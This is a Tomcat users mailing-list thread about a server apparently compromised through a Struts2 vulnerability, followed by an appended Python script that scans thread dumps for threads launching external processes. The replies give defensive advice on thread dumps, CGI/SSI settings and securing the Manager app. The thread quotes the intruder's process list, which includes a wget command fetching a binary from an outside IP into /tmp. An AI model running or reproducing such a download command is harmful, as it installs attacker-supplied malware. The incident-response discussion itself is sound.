On 30. April 2014 17:35:52 MESZ, Leonardo Santagostini <lsantagost...@gmail.com> wrote:
>Hello list,
>
>well my homework is done
>
>Here are the links:
>
>setenv.sh: http://pastebin.com/EN1mXDFi
>catalina.sh: http://pastebin.com/1vRVLbSm
>web.xml: http://pastebin.com/BqEfiXXm
>server.xml: http://pastebin.com/wfzE8bYU
>logging.properties: http://pastebin.com/Qurk8sLU
>catalina.properties: http://pastebin.com/jkfY1ZRQ
>tree + logsfiles: http://pastebin.com/j3tip4ij
From the logfiles it looks like you have struts2 applications. It might be that you are hit by a security problem within struts2 (Konstantin forwarded a warning a few days ago: http://tomcat.10.x6.nabble.com/Fwd-ANN-Struts-2-up-to-2-3-16-1-Zero-Day-Exploit-Mitigation-security-critical-td5016578.html).

>Note that logsfiles are not the logfiles itself but only an ls -lah (just for you to see the log sizes).
>
>A little more about the infrastructure I've mounted; I'll do some ASCII art.
>
>internet ---> FW -->nat-->Haproxy (1)-->Apache(2)--> mod_jk (3)-->Haproxy(4)--> Tomcat7(5) --> haproxy(6) --Tomcat(7)

That seems a bit too complex. In my eyes you need no haproxy between httpd and tomcat when you use mod_jk.

Regards
Felix

>Apache(2) is serving static content, so haproxy(1) at the first level does http round robin balancing.
>Apache(2) connects to tomcat(5) through haproxy(4) (using an L4 connection) using mod_jk(3).
>Tomcat(5) are the main app servers (the ones that get intruded), which use tomcat(7) (solr service) through haproxy(6) using an L4 connection.
>
>Versions:
>
>Apache: 2.2.17
>mod_jk: 1.2.31
>haproxy: 1.4.22
>Tomcat: 7.0.53
>Java: 1.6.0.41
>
>[root@arcbaappvrt05 tomcat]# /usr/java/default/bin/java -version
>java version "1.6.0_41"
>Java(TM) SE Runtime Environment (build 1.6.0_41-b02)
>Java HotSpot(TM) 64-Bit Server VM (build 20.14-b01, mixed mode)
>
>OS: CentOS 5.8 64 bit
>
>[root@arcbaappvrt05 tomcat]# uname -a
>Linux arcbaappvrt05.tic.yellargentina.com 2.6.18-308.el5 #1 SMP Tue Feb 21 20:06:06 EST 2012 x86_64 x86_64 x86_64 GNU/Linux
>[root@arcbaappvrt05 tomcat]# cat /etc/redhat-release
>CentOS release 5.8 (Final)
>[root@arcbaappvrt05 tomcat]#
>
>For now I haven't seen that the squid process was launched, so I couldn't do a dump.
>
>Let me know if you need more information.
>
>BTW, pastebin links will work for one week.
>
>Kind regards, yours
>
>Saludos.-
>Leonardo Santagostini
>
><http://ar.linkedin.com/in/santagostini>
>
>
>2014-04-30 11:09 GMT-03:00 Leonardo Santagostini <lsantagost...@gmail.com>:
>
>> Ok, I will do the following:
>>
>> 1) thread dump of running tomcat instance
>> 2) Pastebin the running tomcat config
>>
>> I think at midday I will have all the info.
>>
>> Thanks all for replying to me and for all the responses.
>>
>> Regards, Leonardo
>>
>> Saludos.-
>> Leonardo Santagostini
>>
>> <http://ar.linkedin.com/in/santagostini>
>>
>>
>> 2014-04-30 10:55 GMT-03:00 Christopher Schultz <ch...@christopherschultz.net>:
>>
>>> Konstantin,
>>>
>>> On 4/29/14, 4:54 PM, Konstantin Kolinko wrote:
>>> > 2014-04-30 0:41 GMT+04:00 Leonardo Santagostini <lsantagost...@gmail.com>:
>>> >> Hello Dan,
>>> >>
>>> >> Nope, the attacker is executing locally the following
>>> >>
>>> >> tomcat 8882 1 0 Apr27 ? 00:00:00 sh /tmp/4.sh
>>> >> tomcat 8893 8882 0 Apr27 ? 00:00:00 wget http://218.199.102.59/.xy/squid32 -O /tmp/squid
>>> >>
>>> >> And then it launches squid, which tries to connect via ssh to various places.
>>> >>
>>> >> Right now it's time to leave the office, but in a few hours I will paste in pastebin access logs, config files, whatever you tell me.
>>> >>
>>> >> This is my pstree
>>> >>
>>> >> [root@arcbaappvrt05 apache-tomcat-7.0.53]# pstree
>>> >> init─┬─atd
>>> >>      ├─java─┬─sh───wget
>>> >>      │      └─263*[{java}]
>>> >
>>> > sh launched by tomcat's java?
>>>
>>> Yes: please verify that it's the JVM running Tomcat, and not just any JVM process.
>>>
>>> > Take a thread dump:
>>> >
>>> > https://wiki.apache.org/tomcat/HowTo#How_do_I_obtain_a_thread_dump_of_my_running_webapp_.3F
>>> >
>>> > It shall show what is the stacktrace in the thread that launched the external process.
>>>
>>> +1
>>>
>>> The only things that ship with Tomcat that call Process.exec() are the CGI servlet and SSI, both of which are disabled by default. So, either you have an insecure CGI/SSI configuration, your web application has a vulnerability, or you have deployed something like the Manager application and improperly secured it.
>>>
>>> A classic example of such an intrusion might be that someone got a foothold elsewhere into your network, and the Manager web application is not properly secured with a password, etc.
>>>
>>> -chris
>>>
>>> ---------------------------------------------------------------------
>>> To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
>>> For additional commands, e-mail: users-h...@tomcat.apache.org
>>>
>>>
>>
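Following Konstantin's thread-dump advice and Chris's note that only the CGI servlet and SSI call Process.exec() out of the box, an added example that is not part of the thread: a Python triage script that parses a thread dump and reports any thread whose stack contains a process-launch frame, together with the first non-JDK frame, which is the application code that spawned the shell. The dump and the class name com.example.app.ReportAction are constructed for the example.

```python
import re
# JDK frames whose presence means the thread is starting an external process.
LAUNCH_FRAMES = ("java.lang.ProcessBuilder.start", "java.lang.Runtime.exec",
                 "java.lang.UNIXProcess.", "java.lang.ProcessImpl.")
# Frames owned by the JDK; the first frame outside these is the application caller.
JDK_PREFIXES = ("java.", "javax.", "sun.", "com.sun.")

THREAD_HEADER = re.compile(r'^"(?P<name>[^"]+)"')
FRAME = re.compile(r"^\s+at (?P<frame>\S+)\(")

# Constructed sample dump (not from the mailing-list thread): one worker thread is
# inside Runtime.exec(), called from the hypothetical action class com.example.app.ReportAction.
SAMPLE_DUMP = '''
"http-bio-8080-exec-5" daemon prio=10 nid=0x2b1a runnable
   java.lang.Thread.State: RUNNABLE
        at java.lang.UNIXProcess.forkAndExec(Native Method)
        at java.lang.ProcessImpl.start(ProcessImpl.java:130)
        at java.lang.ProcessBuilder.start(ProcessBuilder.java:1021)
        at java.lang.Runtime.exec(Runtime.java:615)
        at com.example.app.ReportAction.execute(ReportAction.java:42)
        at org.apache.catalina.core.ApplicationFilterChain.doFilter(ApplicationFilterChain.java:208)
        at java.lang.Thread.run(Thread.java:662)

"http-bio-8080-exec-2" daemon prio=10 nid=0x2b1b waiting on condition
        at sun.misc.Unsafe.park(Native Method)
        at java.lang.Thread.run(Thread.java:662)
'''

def parse_thread_dump(text):
    """Split jstack / kill -3 output into (thread name, [frames, innermost first]) pairs."""
    threads = []
    for line in text.splitlines():
        header = THREAD_HEADER.match(line)
        if header:
            threads.append((header.group("name"), []))
            continue
        frame = FRAME.match(line)
        if frame and threads:
            threads[-1][1].append(frame.group("frame"))
    return threads

def find_process_launchers(text):
    """Map each process-launching thread to its first non-JDK frame, i.e. the code responsible."""
    hits = {}
    for name, frames in parse_thread_dump(text):
        if any(f.startswith(LAUNCH_FRAMES) for f in frames):
            hits[name] = next((f for f in frames if not f.startswith(JDK_PREFIXES)), None)
    return hits
```

Run against a real dump, a caller in org.apache.catalina.servlets.CGIServlet or org.apache.catalina.ssi points at the CGI/SSI configuration Chris mentions, while a caller in your own package points at the web application.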